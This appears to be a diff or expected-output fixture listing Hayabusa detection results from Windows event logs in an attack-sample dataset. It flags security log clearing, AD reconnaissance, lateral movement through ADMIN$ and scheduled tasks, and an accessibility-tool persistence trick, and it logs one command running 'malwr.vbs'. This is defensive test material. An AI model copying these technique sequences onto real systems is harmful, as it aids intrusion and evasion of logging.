+2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer:  | IP Addr: 10.0.2.17 | LID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx
+2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer:  | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: user01 | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.0.2.17 | LID: 0x15e1a7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: \??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx
+2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer:  | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer:  | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx
+2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer:  | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx
+2019-03-19 09:41:29.008 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,,New Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:24.901 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:22:40.373 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3092 | PGUID: 365ABB72-2560-5C91-0000-0010C721DA05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:26:03.585 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:26:05.628 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:31:03.687 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:36:03.788 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:03.890 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.777 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.967 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:08.977 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:41:09.828 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 365ABB72-29B5-5C91-0000-0010BE04C408",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 02:42:05.859 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.238 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.458 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.699 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 365ABB72-528D-5C91-0000-001062560000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
